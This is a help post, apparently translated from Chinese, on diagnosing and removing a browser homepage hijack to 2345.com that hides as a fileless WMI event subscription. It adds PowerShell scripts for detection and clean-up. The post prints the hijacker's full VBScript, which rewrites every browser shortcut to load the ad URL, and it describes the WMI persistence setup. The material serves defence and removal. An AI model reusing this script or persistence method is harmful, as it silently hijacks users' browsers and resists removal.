How to fix IE, Firefox and other browsers having their home page hijacked to www.2345.com/?kunown [with screenshots]
Recently I saw several reports online from users who, after downloading and using the VeryCD download-link viewer tool, found that opening a browser jumped straight to the navigation page www.2345.com/?kunown. It happened in every browser they opened (IE, Chrome, Firefox, Opera, Safari, Maxthon), all with the same symptom, and yet the browser home-page settings all checked out as normal!
In the end it turned out that the IE shortcut command in the Quick Launch bar had been modified; after the change it looked like the figure below. So I assumed it was an ordinary shortcut modification and removed the 2345 URL part by hand, but half an hour later it had been changed again. Thinking a startup item might have been loaded, I searched the registry, the startup items and the services, and found nothing; after a reboot the IE shortcut was tampered with again. I tried Event Viewer and Task Scheduler, and found nothing there either.
I then installed Super Rabbit, 360 and ExterminateIt to scan, and they detected nothing as well.
I opened Process Monitor to watch, and found that every 30 minutes a scrcons.exe process started by itself, modified the Quick Launch commands, and then exited (lucky it was every 30 minutes; if it had been once every 24 hours I would have been in real trouble...). On Win7 the modified Opera Quick Launch icon path looked like this:
c:\users\iefans\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\opera12.01 1532.lnk
Looking it up, this turned out to be a scheduled script launched automatically through WMI. To view WMI events, download WMI Tools from the following address and install it.
After installing, open WMI Event Viewer, click Register For Events at the top left, and the Connect to namespace dialog pops up. Enter "root\subscription" (copy and paste it by hand; the default that appears is not this), press OK, and the figure below appears:
Click __EventFilter:Name="unown_filter" on the left, then on the right right-click ActiveScriptEventConsumer Name="unown" and choose View Instance Properties, as in the figure below:
Looking at the ScriptText item shows that this is a VBScript that the system service runs every 30 minutes, and it adds "http://www.2345.com/?kunown" to every browser shortcut command! Got you~! It is well hidden: no resident process, no file on disk (it stores itself in the WMI database).
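The same inspection can be done without the WMI Tools GUI. The PowerShell script below is an added example, not part of the original post or of any tool it mentions: it enumerates the permanent event subscriptions in root\subscription and prints the script body of every ActiveScriptEventConsumer (the class whose scripts run inside scrcons.exe, which is why Process Monitor saw that process every 30 minutes). It goes slightly beyond the post by also listing CommandLineEventConsumer objects and by flagging any script whose text contains a URL, a browser executable name or shortcut manipulation, which is the pattern seen here. The marker list in `$markers` is an assumption chosen for this hijack, not a general rule.

```powershell
# Added example, not part of the original post: list every permanent WMI event
# subscription in root\subscription and print the script body of each
# ActiveScriptEventConsumer, so a pair like "unown_filter" / "unown" can be found
# without the WMI Tools GUI. Run from an elevated PowerShell prompt; uses
# Get-WmiObject so it also works on Windows 7 with PowerShell 2.0.
$ns = 'root\subscription'

Write-Host '=== __EventFilter: the trigger (timer or process-start query) ==='
Get-WmiObject -Namespace $ns -Class __EventFilter |
    Select-Object Name, EventNamespace, QueryLanguage, Query |
    Format-List

Write-Host '=== ActiveScriptEventConsumer: the script payload (runs inside scrcons.exe) ==='
Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer | ForEach-Object {
    Write-Host ("--- Name: {0}   Engine: {1}" -f $_.Name, $_.ScriptingEngine)
    # ScriptText is the full VBScript/JScript body; a hard-coded URL or a list
    # of browser executables in here is the giveaway
    Write-Host $_.ScriptText
}

# Not mentioned in the post, but worth checking in the same pass: consumers that
# run a command line instead of a script.
Write-Host '=== CommandLineEventConsumer (if any) ==='
Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -ErrorAction SilentlyContinue |
    Select-Object Name, CommandLineTemplate, ExecutablePath |
    Format-List

Write-Host '=== __FilterToConsumerBinding: which filter fires which consumer ==='
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Select-Object Filter, Consumer |
    Format-List

# Quick triage: flag any script consumer whose body contains a URL or touches
# browser executables / .lnk files. The marker list is an assumption tailored
# to this hijack; extend it for your own environment.
$markers = @('http://', 'https://', '.lnk', 'CreateShortcut', 'iexplore.exe', 'chrome.exe', 'firefox.exe')
Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer | ForEach-Object {
    $text = [string]$_.ScriptText
    $hits = @($markers | Where-Object { $text.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0 })
    if ($hits.Count -gt 0) {
        Write-Warning ("Suspicious consumer '{0}' matches: {1}" -f $_.Name, ($hits -join ', '))
    }
}
```

On a clean machine the three listings are normally empty or contain only entries you can account for (some management agents register their own); an unfamiliar filter with a timer-style query bound to a script consumer is exactly what this post describes.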
The affected browsers (browsers of every flavour, a pretty complete list):
"iexplore.exe", "chrome.exe", "firefox.exe", "360chrome.exe", "360se.exe", "sogouexplorer.exe", "opera.exe", "safari.exe", "maxthon.exe", "ttraveler.exe", "theworld.exe", "baidubrowser.exe", "liebao.exe", "qqbrowser.exe"
The full code is as follows:
On Error Resume Next
Const link = "http://www.2345.com/?kunown"
browsers = Array("iexplore.exe", "chrome.exe", "firefox.exe", "360chrome.exe", "360se.exe", "sogouexplorer.exe", "opera.exe", "safari.exe", "maxthon.exe", "ttraveler.exe", "theworld.exe", "baidubrowser.exe", "liebao.exe", "qqbrowser.exe")

' Lookup table of browser executable names, keyed in lower case
Set odic = CreateObject("Scripting.Dictionary")
For Each browser In browsers
    odic.Add LCase(browser), browser
Next

Set fso = CreateObject("Scripting.FileSystemObject")
Set wshshell = CreateObject("WScript.Shell")

' Folders whose .lnk files get rewritten; the user name is hard-coded
strdesktop = "c:\users\gemini\desktop"
strallusersdesktop = wshshell.SpecialFolders("AllUsersDesktop")
quicklaunch = "c:\users\gemini\appdata\roaming\microsoft\internet explorer\quick launch"
userpinnedstartmenu = quicklaunch & "\user pinned\startmenu"
userpinnedtaskbar = quicklaunch & "\user pinned\taskbar"

' For every shortcut whose target is one of the listed browsers, set the
' shortcut's Arguments to the hijack URL. Attribute bit 1 is ReadOnly; it is
' cleared first so that Save succeeds.
For Each file In fso.GetFolder(strdesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oshelllink = wshshell.CreateShortcut(file.Path)
        path = oshelllink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If odic.Exists(LCase(name)) Then
            oshelllink.Arguments = link
            If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
            End If
            oshelllink.Save
        End If
    End If
Next

For Each file In fso.GetFolder(strallusersdesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oshelllink = wshshell.CreateShortcut(file.Path)
        path = oshelllink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If odic.Exists(LCase(name)) Then
            oshelllink.Arguments = link
            If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
            End If
            oshelllink.Save
        End If
    End If
Next

If fso.FolderExists(quicklaunch) Then
    For Each file In fso.GetFolder(quicklaunch).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oshelllink = wshshell.CreateShortcut(file.Path)
            path = oshelllink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If odic.Exists(LCase(name)) Then
                oshelllink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oshelllink.Save
            End If
        End If
    Next
End If

If fso.FolderExists(userpinnedstartmenu) Then
    For Each file In fso.GetFolder(userpinnedstartmenu).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oshelllink = wshshell.CreateShortcut(file.Path)
            path = oshelllink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If odic.Exists(LCase(name)) Then
                oshelllink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oshelllink.Save
            End If
        End If
    Next
End If

If fso.FolderExists(userpinnedtaskbar) Then
    For Each file In fso.GetFolder(userpinnedtaskbar).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oshelllink = wshshell.CreateShortcut(file.Path)
            path = oshelllink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If odic.Exists(LCase(name)) Then
                oshelllink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oshelllink.Save
            End If
        End If
    Next
End If
Finally, the removal method: in WMI Event Viewer, right-click the "__EventFilter:Name="unown_filter"" entry and delete it!
Can't delete it?
Go to the WMI Tools install path (for example c:\program files (x86)\wmi tools), right-click WbemEventViewer.exe and choose Run as administrator! Then delete it!
Not done yet: you still have to manually remove http://www.2345.com/?kunown from each browser's shortcut command in the Quick Launch bar!
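The whole clean-up above can also be scripted. The PowerShell below is an added example, not part of the original post; it assumes the names the post reports (filter "unown_filter", consumer "unown") and the URL http://www.2345.com/?kunown. It goes a little beyond the post's GUI procedure: it removes the binding and the consumer as well as the filter, so no script text is left in the repository, and it walks the same folders the hijack script did (desktop, all-users desktop, Quick Launch and its pinned folders) resolved through WScript.Shell rather than a hard-coded user name. Removing objects from root\subscription needs administrator rights, which is the same reason the viewer had to be run as administrator.

```powershell
# Added example, not part of the original post: remove the WMI subscription that
# keeps re-writing the shortcuts, then strip the injected URL from every browser
# shortcut. Run from an elevated PowerShell prompt.
$ns           = 'root\subscription'
$filterName   = 'unown_filter'                 # names as reported in the post
$consumerName = 'unown'
$hijackUrl    = 'http://www.2345.com/?kunown'

# Step 1: binding first, then consumer, then filter. Deleting only the filter
# (as the GUI procedure does) stops the trigger but leaves the consumer, and
# with it the script text, sitting in the WMI repository.
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Where-Object { $_.Filter -like "*Name=`"$filterName`"*" -or $_.Consumer -like "*Name=`"$consumerName`"*" } |
    Remove-WmiObject
Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -Filter "Name='$consumerName'" |
    Remove-WmiObject
Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$filterName'" |
    Remove-WmiObject

# Step 2: the hijack script overwrote the Arguments field of each .lnk whose
# target is a browser. Walk the same folders and remove the URL again.
$shell       = New-Object -ComObject WScript.Shell
$quickLaunch = Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch'
$folders = @(
    $shell.SpecialFolders.Item('Desktop'),
    $shell.SpecialFolders.Item('AllUsersDesktop'),
    $quickLaunch,
    (Join-Path $quickLaunch 'User Pinned\StartMenu'),
    (Join-Path $quickLaunch 'User Pinned\TaskBar')
) | Where-Object { $_ -and (Test-Path $_) }

foreach ($folder in $folders) {
    Get-ChildItem -Path $folder -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
        $sc = $shell.CreateShortcut($_.FullName)
        if ($sc.Arguments -like "*$hijackUrl*") {
            Write-Host ("Cleaning {0}`n    was: {1}" -f $_.FullName, $sc.Arguments)
            # remove only the injected URL; any other arguments are kept
            $sc.Arguments = ($sc.Arguments.Replace($hijackUrl, '')).Trim()
            # the hijack script cleared ReadOnly before saving; do the same
            if ($_.IsReadOnly) { $_.IsReadOnly = $false }
            $sc.Save()
        }
    }
}
```

Run step 1 before step 2: if the subscription is still registered, the next 30-minute trigger simply puts the URL back, which is exactly what happened when the shortcuts were fixed by hand at the start of the post.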
That's all for now; if there are any other side effects, we'll see after using the machine for a while!
Solution from: gemini